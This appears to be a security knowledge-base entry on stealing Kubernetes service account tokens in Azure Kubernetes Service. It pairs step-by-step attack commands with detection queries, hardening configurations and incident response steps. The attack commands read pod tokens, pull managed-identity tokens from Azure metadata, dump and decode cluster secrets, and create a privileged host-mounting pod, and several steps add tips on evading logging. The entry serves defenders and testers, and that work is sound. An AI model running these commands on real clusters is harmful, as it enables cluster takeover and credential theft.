| Attribute | Details |
|---|---|
| Technique ID | LM-AUTH-030 |
| MITRE ATT&CK v18.1 | T1528 - Steal Application Access Token |
| Tactic | Credential Access / Lateral Movement |
| Platforms | Entra ID, Azure Kubernetes Service (AKS) |
| Severity | Critical |
| CVE | N/A |
| Technique Status | ACTIVE |
| Last Verified | 2025-01-10 |
| Affected Versions | Kubernetes 1.18+, AKS all versions |
| Patched In | N/A (Requires configuration hardening) |
| Author | SERVTEP – Artur Pchelnikau |
Concept: Kubernetes automatically mounts service account tokens to containers by default, allowing processes within pods to authenticate to the Kubernetes API server. When a container is compromised, attackers can extract this token from the pod’s filesystem (typically at /var/run/secrets/kubernetes.io/serviceaccount/token) and use it to interact with the Kubernetes API. This grants the attacker the permissions of that service account, enabling lateral movement across the cluster, secret enumeration, and further resource compromise.
Attack Surface: The service account token mounted on every pod; the Kubernetes API server (typically accessible at https://kubernetes.default.svc.cluster.local:443 from within the cluster); the instance metadata service (Azure WireServer) for retrieving bootstrap tokens in AKS environments.
Business Impact: Complete cluster compromise possible. An attacker with a compromised service account token can enumerate all resources in the cluster, steal secrets stored in etcd, pivot to other namespaces, create new workloads with malicious code, exfiltrate data, or launch denial-of-service attacks. If the compromised pod has broad permissions (e.g., cluster-admin), the attacker gains administrative control of the entire Kubernetes cluster.
Technical Context: This attack typically occurs in under 60 seconds once container access is established. Detection is difficult because legitimate Kubernetes components regularly access the API using service account tokens. The attack leaves minimal forensic evidence unless API audit logging is enabled.
| Framework | Control / ID | Description |
|---|---|---|
| CIS Benchmark | 5.1.5 | Ensure that default service accounts are not actively used |
| CIS Benchmark | 5.2.2 | Minimize the admission of containers wishing to share the host IPC namespace |
| DISA STIG | V-254380 | Disable automounting of service account tokens |
| CISA SCuBA | Configuration E.1 | Disable automatic service account token mounting |
| NIST 800-53 | AC-3 | Access Enforcement |
| NIST 800-53 | SC-7 | Boundary Protection |
| GDPR | Art. 32 | Security of Processing |
| DORA | Art. 9 | Protection and Prevention of Threats |
| NIS2 | Art. 21 | Cyber Risk Management Measures |
| ISO 27001 | A.9.2.3 | Management of Privileged Access Rights |
| ISO 27005 | Risk Scenario | Compromise of Container Orchestration Platform |
Supported Versions: Kubernetes 1.18+, AKS all versions (default configuration)
Objective: Gain shell access to a running container within the AKS cluster.
Prerequisite Tactics:
Command (Linux Container):
# Assuming you have shell access to the container via RCE, kubectl exec, or docker exec
# List the mounted service account token
cat /var/run/secrets/kubernetes.io/serviceaccount/token
Expected Output:
eyJhbGciOiJSUzI1NiIsImtpZCI6IklGMWZzYWRmN2R...
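The token is a JWT, so its claims can be inspected offline before use. A minimal sketch with a synthetic token (the payload below is illustrative, not a real AKS token; `base64`/`cut`/`tr` from coreutils assumed):

```shell
# Build a synthetic service-account JWT (header.payload.signature) for illustration
PAYLOAD_JSON='{"iss":"kubernetes/serviceaccount","sub":"system:serviceaccount:default:default"}'
PAYLOAD_B64=$(printf '%s' "$PAYLOAD_JSON" | base64 | tr -d '=\n')   # JWT segments are unpadded
TOKEN="eyJhbGciOiJSUzI1NiJ9.${PAYLOAD_B64}.sig"

# Decode the claims segment: translate base64url to base64 and restore padding
SEG=$(printf '%s' "$TOKEN" | cut -d'.' -f2 | tr '_-' '/+')
while [ $(( ${#SEG} % 4 )) -ne 0 ]; do SEG="${SEG}="; done
printf '%s' "$SEG" | base64 -d
```

The same decode loop works on a real stolen token and reveals the bound service account and namespace in the `sub` claim.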
What This Means:
OpSec & Evasion:
Troubleshooting:
Permission denied: /var/run/secrets/kubernetes.io/serviceaccount/token
Cause: Token mounting is disabled; this step requires automountServiceAccountToken: true (default) in the pod spec
References & Proofs:

Objective: From a pod sharing the host network namespace in AKS, query the Azure metadata services (IMDS and WireServer) to retrieve tokens with elevated privileges.
Version Note: This technique is specific to Azure Kubernetes Service (AKS). It does NOT work on GKE or self-managed Kubernetes clusters.
Command (Host Network Pod):
# From within a pod with hostNetwork: true
curl -s "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2017-09-01&resource=https://management.azure.com" \
-H "Metadata:true" | jq '.access_token' -r
# Alternatively, query for the bootstrap token (if accessible)
curl -s "http://168.63.129.16/metadata/instance?api-version=2021-02-01" \
-H "Metadata:true" | jq .
Expected Output:
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6IjE4MjcyMjJkO...
What This Means:
OpSec & Evasion:
Troubleshooting:
curl: (7) Failed to connect to 169.254.169.254
Cause: The pod lacks hostNetwork: true, or the metadata service is restricted
Fix: Redeploy with hostNetwork: true in the pod spec
References & Proofs:
Objective: Authenticate to the Kubernetes API server using the stolen token to enumerate cluster resources and exfiltrate sensitive data.
Command (From Compromised Pod or External Machine):
# Set the token variable
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
APISERVER=https://kubernetes.default.svc.cluster.local:443
# Test connectivity to the API server
curl -k -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/namespaces
# List all pods in the current namespace
curl -k -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/namespaces/$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)/pods
# Attempt to list secrets
curl -k -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/namespaces/$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)/secrets
# If service account has cluster-wide permissions, enumerate all secrets across namespaces
curl -k -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/secrets
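All of the calls above share one URL shape; a tiny helper (hypothetical `k8s_url` function, not part of any tool) makes the pattern explicit:

```shell
# Compose Kubernetes API URLs for namespaced core (v1) resources
APISERVER="https://kubernetes.default.svc.cluster.local:443"
k8s_url() {   # usage: k8s_url <namespace> <resource>
  printf '%s/api/v1/namespaces/%s/%s\n' "$APISERVER" "$1" "$2"
}

k8s_url default secrets
# → https://kubernetes.default.svc.cluster.local:443/api/v1/namespaces/default/secrets
```

Each result feeds directly into `curl -k -H "Authorization: Bearer $TOKEN" ...` exactly as in the commands above.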
Expected Output:
{
"apiVersion": "v1",
"items": [
{
"apiVersion": "v1",
"data": {
"password": "c3VwZXJzZWNyZXQxMjM=",
"username": "YWRtaW4="
},
"kind": "Secret",
"metadata": {
"name": "db-credentials",
"namespace": "default"
},
"type": "Opaque"
}
],
"kind": "SecretList",
"metadata": {
"resourceVersion": "123456"
}
}
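The `data` values in the output above are only Base64-encoded; decoding them locally recovers the plaintext credentials:

```shell
# Kubernetes secret values are Base64-encoded, not encrypted
printf '%s' 'c3VwZXJzZWNyZXQxMjM=' | base64 -d; echo   # → supersecret123
printf '%s' 'YWRtaW4=' | base64 -d; echo               # → admin
```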
What This Means:
The response confirms the service account holds get secrets permission
The data field in Kubernetes secrets is Base64-encoded, NOT encrypted – any tool can decode it
OpSec & Evasion:
API requests are only recorded when audit logging (e.g., --audit-log-maxage) is configured
Use kubectl with the token (via the --token flag) rather than raw curl to appear more legitimate
Troubleshooting:
{ "kind": "Status", "apiVersion": "v1", "metadata": {}, "status": "Failure", "message": "secrets is forbidden", "reason": "Forbidden"}
Cause: The service account lacks get permissions on the secrets resource
References & Proofs:
Objective: Use API access to create a new pod with elevated privileges (if service account has pod creation permission), enabling further escalation or persistence.
Command (Using stolen token):
# Create a malicious pod spec
cat > /tmp/evil-pod.yaml <<EOF
apiVersion: v1
kind: Pod
metadata:
name: privilege-escalation-pod
namespace: default
spec:
hostNetwork: true
hostPID: true
hostIPC: true
containers:
- name: shell
image: ubuntu:22.04
securityContext:
privileged: true
runAsUser: 0
command: ["sleep", "3600"]
volumeMounts:
- name: host-root
mountPath: /host
volumes:
- name: host-root
hostPath:
path: /
EOF
# Submit the pod using the stolen token
curl -k -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/yaml" \
-d @/tmp/evil-pod.yaml \
https://kubernetes.default.svc.cluster.local:443/api/v1/namespaces/default/pods
# Exec into the pod. The exec subresource requires a WebSocket/SPDY protocol
# upgrade, so a plain curl POST will not return an interactive shell; use
# kubectl with the stolen token instead:
kubectl --server=https://kubernetes.default.svc.cluster.local:443 \
  --token="$TOKEN" --insecure-skip-tls-verify \
  exec -it privilege-escalation-pod -n default -- bash
Expected Output:
pod/privilege-escalation-pod created
# Interactive shell access to the host filesystem
root@privilege-escalation-pod:/#
What This Means:
A privileged pod with the host filesystem mounted at /host has been created
OpSec & Evasion:
Use common base images (e.g., ubuntu:22.04 or redis:latest) to blend in with normal workloads
Troubleshooting:
{ "kind": "Status", "apiVersion": "v1", "metadata": {}, "status": "Failure", "message": "pods is forbidden", "reason": "Forbidden"}
References & Proofs:
Supported Versions: Kubernetes 1.18+, all versions
Objective: Set up a local kubectl client to use the stolen token for authentication, enabling command-line interaction with the cluster.
Command:
# Extract the token from the pod
export TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
export API_SERVER="https://kubernetes.default.svc.cluster.local:443"
export NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
# Create a kubeconfig file with the stolen token
cat > /tmp/kubeconfig <<EOF
apiVersion: v1
kind: Config
clusters:
- cluster:
certificate-authority-data: LS0tLS1CRUdJTiBDRVJ... # (Base64-encoded CA cert)
server: https://your-aks-cluster.hcp.eastus.azmk8s.io:443
name: your-aks-cluster
contexts:
- context:
cluster: your-aks-cluster
namespace: $NAMESPACE
user: service-account
name: default
current-context: default
users:
- name: service-account
user:
token: $TOKEN
EOF
# Use the kubeconfig to interact with the cluster
export KUBECONFIG=/tmp/kubeconfig
kubectl get pods
kubectl get secrets
kubectl exec -it <pod-name> -- /bin/bash
Expected Output:
NAME READY STATUS RESTARTS AGE
my-application-7d9f8c 1/1 Running 0 2d
database-pod-5c8b6f 1/1 Running 1 5d
What This Means:
OpSec & Evasion:
Avoid verbose output flags (-v), which may be logged
Troubleshooting:
error: unable to get API server...
Cause: The in-cluster API server address does not resolve from outside the cluster
Fix: Use the cluster's public FQDN instead (az aks show --name <cluster-name> --query fqdn)
References & Proofs:
Supported Versions: AKS (Azure Kubernetes Service) running Kubernetes 1.18+
Objective: In AKS environments, retrieve a bootstrap token with elevated privileges from the Azure Instance Metadata Service.
Prerequisite: The pod must be running with hostNetwork: true to access the metadata service.
Command:
# Query the Azure Instance Metadata Service
WIRESERVER="http://168.63.129.16/"
IMDS_TOKEN=$(curl -s -H "Metadata:true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2017-09-01&resource=https://management.azure.com" | jq -r '.access_token')
# Decode and inspect the claims segment (JWT payloads are base64url-encoded
# without padding; translate the alphabet and re-pad before decoding)
CLAIMS=$(echo "$IMDS_TOKEN" | cut -d'.' -f2 | tr '_-' '/+')
while [ $(( ${#CLAIMS} % 4 )) -ne 0 ]; do CLAIMS="${CLAIMS}="; done
echo "$CLAIMS" | base64 -d | jq .
# Use the token to access Azure resources
curl -s -H "Authorization: Bearer $IMDS_TOKEN" \
"https://management.azure.com/subscriptions?api-version=2020-01-01" | jq .
Expected Output:
{
"aud": "https://management.azure.com",
"iss": "https://sts.windows.net/12345678-1234-1234-1234-123456789012/",
"iat": 1234567890,
"nbf": 1234567890,
"exp": 1234571490,
"aio": "E2RgYIg/12345+abcde/ABCD==",
"appid": "00000000-0000-0000-0000-000000000000",
"appidacr": "2",
"idp": "https://sts.windows.net/12345678-1234-1234-1234-123456789012/",
"oid": "87654321-4321-4321-4321-210987654321",
"rh": "0.ARoA1234567...",
"sub": "87654321-4321-4321-4321-210987654321",
"tid": "12345678-1234-1234-1234-123456789012",
"uti": "abcdefghijklmnop",
"ver": "1.0"
}
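The `iat`/`exp` claims above bound the token's usable window; simple shell arithmetic (values taken from the sample claims) shows the lifetime:

```shell
# Lifetime of the sample token: exp minus iat, in minutes
IAT=1234567890
EXP=1234571490
echo "Token valid for $(( (EXP - IAT) / 60 )) minutes"   # → Token valid for 60 minutes
```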
What This Means:
tid (tenant ID) and oid (object ID) identify the managed identity associated with the node
OpSec & Evasion:
Troubleshooting:
curl: (7) Failed to connect to 169.254.169.254
Cause: The pod is not running with hostNetwork: true
Fix: Redeploy the pod with hostNetwork: true in the spec
References & Proofs:
Command (Atomic Simulation):
# Simulate a compromised pod environment (ubuntu:22.04 does not ship curl, so install it first)
docker run --rm ubuntu:22.04 bash -c '
  apt-get update -qq && apt-get install -y -qq curl >/dev/null
  # Extract the token from the default mount path (absent outside a real pod)
  TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null || echo "token-not-mounted")
  echo "Stolen Token: $TOKEN"
  # Attempt API access (fails outside a cluster: the service DNS name does not resolve)
  curl -k -s -H "Authorization: Bearer $TOKEN" https://kubernetes.default.svc.cluster.local:443/api/v1/namespaces 2>&1 | head -20
'
Reference:
Version: 1.1.8+
Minimum Version: 1.0
Supported Platforms: Linux, macOS, Windows (WSL)
URL: https://github.com/inguardians/peirates
Installation:
git clone https://github.com/inguardians/peirates.git
cd peirates
go build -o peirates main.go
./peirates --help
Usage:
# Run Peirates in interactive mode
./peirates
# List available service account tokens
> available_pods
> steal_token
> kubectl_commands
Version: v1.28+
Minimum Version: v1.18
Supported Platforms: All (Linux, macOS, Windows)
URL: https://kubernetes.io/docs/tasks/tools/
Installation:
# macOS
brew install kubectl
# Linux
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
chmod +x kubectl
sudo mv kubectl /usr/local/bin/
# Windows
choco install kubernetes-cli
Usage:
# Set kubeconfig with stolen token
export KUBECONFIG=/tmp/kubeconfig
kubectl get pods
kubectl get secrets
kubectl exec -it <pod> -- /bin/bash
Version: 7.0+
Installation: Typically pre-installed on Linux/macOS; available for Windows
Usage:
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl -k -H "Authorization: Bearer $TOKEN" https://kubernetes.default.svc.cluster.local:443/api/v1/namespaces
Rule Configuration:
Required Table: KubeAudit (if audit logging enabled)
Key Fields: username, verb, objectRef, sourceIPs
KQL Query:
KubeAudit
| where verb in ("get", "list") and tostring(objectRef.resource) == "secrets"
| where username has "system:serviceaccount"
| where not(ipv4_is_private(tostring(sourceIPs[0]))) // Exclude internal (RFC 1918) cluster IPs
| summarize count() by username, namespace = tostring(objectRef.namespace), sourceIP = tostring(sourceIPs[0])
| where count_ > 5 // Threshold: more than 5 secret list operations
| project-reorder username, namespace, sourceIP, count_
What This Detects:
Manual Configuration Steps (Azure Portal):
Rule Name: Unusual Kubernetes Secret Enumeration via Service Account Token
Severity: High
Query Frequency: 5 minutes
Query Period: 24 hours
Manual Configuration Steps (PowerShell):
Connect-AzAccount
$ResourceGroup = "YourResourceGroup"
$WorkspaceName = "YourSentinelWorkspace"
New-AzSentinelAlertRule -ResourceGroupName $ResourceGroup -WorkspaceName $WorkspaceName `
-DisplayName "Unusual Kubernetes Secret Enumeration" `
-Query @"
KubeAudit | where verb in ("get", "list") and tostring(objectRef.resource) == "secrets"
| where username has "system:serviceaccount"
| where not(ipv4_is_private(tostring(sourceIPs[0])))
| summarize count() by username, namespace = tostring(objectRef.namespace), sourceIP = tostring(sourceIPs[0])
| where count_ > 5
"@ `
-Severity "High" `
-Enabled $true
Source: Microsoft Sentinel Kubernetes Monitoring
Rule Configuration:
Required Tables: ContainerImageInventory, ContainerProcessEvents
Key Fields: containerName, process.name, process.commandLine
KQL Query:
ContainerProcessEvents
| where tostring(process.name) in ("cat", "dd", "cp")
    and tostring(process.commandLine) has "/var/run/secrets/kubernetes.io/serviceaccount/token"
| extend ContainerName = tostring(containerName), Process = tostring(process.name), Command = tostring(process.commandLine)
| project TimeGenerated, ContainerName, Process, Command
| join kind=inner (
    KubeAudit
    | where verb == "exec" and tostring(objectRef.resource) == "pods"
    | extend PodName = tostring(objectRef.name)
) on $left.ContainerName == $right.PodName
What This Detects:
Source: Microsoft Defender for Containers Detection
Disable Automatic Service Account Token Mounting: Prevent the kubelet from automatically mounting service account tokens to pods that do not need them.
Pod YAML Configuration (Pod Security Standard):
apiVersion: v1
kind: Pod
metadata:
name: example-pod
spec:
serviceAccountName: example-sa
automountServiceAccountToken: false # Disable token mounting
containers:
- name: app
image: my-app:latest
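A pre-deployment check can gate manifests on this setting; a sketch (the file path, manifest, and messages are illustrative):

```shell
# Write an example manifest, then verify token automounting is explicitly disabled
cat > /tmp/example-pod.yaml <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: example-pod
spec:
  serviceAccountName: example-sa
  automountServiceAccountToken: false
  containers:
  - name: app
    image: my-app:latest
EOF

if grep -q 'automountServiceAccountToken: false' /tmp/example-pod.yaml; then
  echo "OK: token automount disabled"
else
  echo "WARN: pod will automount a service account token" >&2
fi
# → OK: token automount disabled
```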
Manual Steps (Cluster-wide via Pod Security Standards):
Set automountServiceAccountToken: false on pods and service accounts that do not require API access
Manual Steps (PowerShell):
# Pod Security Policies were removed from AKS; enforce pod security via the Azure Policy add-on
az aks enable-addons --resource-group myResourceGroup --name myAKSCluster `
  --addons azure-policy
Version Note: Kubernetes 1.23+ supports Pod Security Standards; earlier versions relied on Pod Security Policies (deprecated in 1.21, removed in 1.25)
Implement Network Policies: Restrict egress from pods to the Kubernetes API server, allowing only necessary services to communicate with the API.
Network Policy Configuration (Calico):
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: restrict-api-access
namespace: default
spec:
podSelector: {} # Apply to all pods in namespace
policyTypes:
- Egress
egress:
- to:
- podSelector:
matchLabels:
k8s-app: kube-dns
ports:
- protocol: UDP
port: 53
- to:
- namespaceSelector: {}
podSelector:
matchLabels:
k8s-app: kubernetes-dashboard
Manual Steps (Azure Portal):
Block egress to kubernetes.default.svc.cluster.local:443 for non-system pods
Enable Kubernetes Audit Logging: Configure audit logging to detect and log all API server access, including token usage.
Manual Steps (Azure Portal):
Manual Steps (PowerShell):
# Enable the monitoring add-on and send cluster logs to a Log Analytics workspace
az aks enable-addons --resource-group myResourceGroup --name myAKSCluster `
  --addons monitoring `
  --workspace-resource-id /subscriptions/{subscriptionId}/resourcegroups/{resourceGroup}/providers/microsoft.operationalinsights/workspaces/{workspaceName}
# kube-audit events additionally require a diagnostic setting on the cluster
# resource with the "kube-audit" log category enabled
Use Azure Key Vault for Secrets Management: Instead of storing secrets in Kubernetes secrets, use Azure Key Vault with managed identities for RBAC-based access.
Configuration (Azure Workload Identity Addon):
apiVersion: v1
kind: ServiceAccount
metadata:
name: workload-identity-sa
namespace: default
annotations:
azure.workload.identity/client-id: <client-id>
---
apiVersion: v1
kind: Pod
metadata:
name: keyvault-pod
namespace: default
labels:
azure.workload.identity/use: "true"
spec:
serviceAccountName: workload-identity-sa
containers:
- name: app
image: my-app:latest
env:
- name: AZURE_CLIENT_ID
value: <client-id>
- name: AZURE_TENANT_ID
value: <tenant-id>
- name: AZURE_FEDERATED_TOKEN_FILE
value: /var/run/secrets/workload.azure.com/serviceaccount/token
Manual Steps (Azure Portal):
Enforce RBAC on Service Accounts: Limit service account permissions to only the minimum required resources and verbs.
RBAC Configuration (ClusterRole):
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: minimal-role
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["get", "list"]
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: minimal-binding
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: minimal-role
subjects:
- kind: ServiceAccount
name: my-app-sa
namespace: default
Manual Steps (kubectl):
# Create a minimal role and bind it to a service account
kubectl create clusterrole minimal-role --verb=get,list --resource=pods
kubectl create clusterrolebinding minimal-binding --clusterrole=minimal-role --serviceaccount=default:my-app-sa
Enable Pod Security Standards: Enforce security policies at the cluster level to restrict privileged pod creation.
Manual Steps (Azure Portal):
Implement Admission Controllers: Use OPA Gatekeeper or Azure Policy to enforce pod security policies.
OPA Gatekeeper Example:
# Deny pods with automountServiceAccountToken: true (except system pods)
deny[msg] {
input.request.kind.kind == "Pod"
input.request.object.spec.automountServiceAccountToken == true
not is_system_namespace
msg := "Service account token auto-mounting is not allowed"
}
is_system_namespace {
input.request.namespace == "kube-system"
}
Manual Installation (Helm):
helm repo add gatekeeper https://open-policy-agent.github.io/gatekeeper/charts
helm install gatekeeper/gatekeeper --name-template=gatekeeper --namespace gatekeeper-system --create-namespace
# Check if service account token auto-mounting is disabled for a pod
kubectl get pod <pod-name> -o jsonpath='{.spec.automountServiceAccountToken}'
# Expected output: false
# Verify audit logging is enabled
az aks show --name <cluster-name> --resource-group <resource-group> --query addonProfiles.omsagent.enabled
# Expected output: true
# Verify network policies are in place
kubectl get networkpolicies --all-namespaces
# Expected output: List of network policies
What to Look For:
Pods should have automountServiceAccountToken: false unless they explicitly require API access
Read operations on /var/run/secrets/kubernetes.io/serviceaccount/token inside containers
GET/LIST operations on secrets, pods, and configmaps resources
Connections to kubernetes.default.svc.cluster.local:443 from non-system pods
Requests to 169.254.169.254 (Azure IMDS) from pods with hostNetwork: true
kube-audit and kube-audit-admin logs in /var/log/kube-audit* or Azure Log Analytics (table: KubeAudit)
Shell history artifacts (.bash_history, .sh_history)
Entries in the AzureDiagnostics table showing API calls made with the service account principal
# Delete the compromised pod
kubectl delete pod <compromised-pod> --namespace <namespace> --grace-period=0 --force
# Block the service account (revoke credentials)
kubectl delete serviceaccount <sa-name> --namespace <namespace>
Manual (Azure Portal):
# Export pod logs
kubectl logs <compromised-pod> --namespace <namespace> > /evidence/pod-logs.txt
# Export audit logs
az aks get-credentials --name <cluster-name> --resource-group <resource-group>
kubectl get events --namespace <namespace> --sort-by='.lastTimestamp' > /evidence/events.txt
# Collect Azure diagnostic logs
az monitor log-analytics query --workspace-id <workspace-id> \
--analytics-query "KubeAudit | where username has '<service-account>' | project TimeGenerated, verb, objectRef, sourceIPs"
Manual:
# Revoke all tokens for the affected service account
kubectl delete secret -l serviceaccount=<sa-name> --namespace <namespace>
# Reset the service account
kubectl delete serviceaccount <sa-name> --namespace <namespace>
kubectl create serviceaccount <sa-name> --namespace <namespace>
# Re-bind RBAC roles if needed
kubectl create rolebinding <rb-name> --clusterrole=<role> --serviceaccount=<namespace>:<sa-name>
Manual:
| Step | Phase | Technique | Description |
|---|---|---|---|
| 1 | Initial Access | [IA-EXPLOIT-004] Kubelet API Unauthorized Access | Attacker gains access to exposed Kubernetes API or container |
| 2 | Persistence | [LM-AUTH-030] AKS Service Account Token Theft | Current Step: Token extracted from pod filesystem |
| 3 | Lateral Movement | [LM-AUTH-031] Container Registry Cross-Registry | Token used to access ACR in different tenant |
| 4 | Impact | [LM-AUTH-032] Function App Identity Hopping | Token used to chain to Azure Function App identity |
| 5 | Impact | Data Exfiltration via Stolen Credentials | Secrets and data extracted using escalated permissions |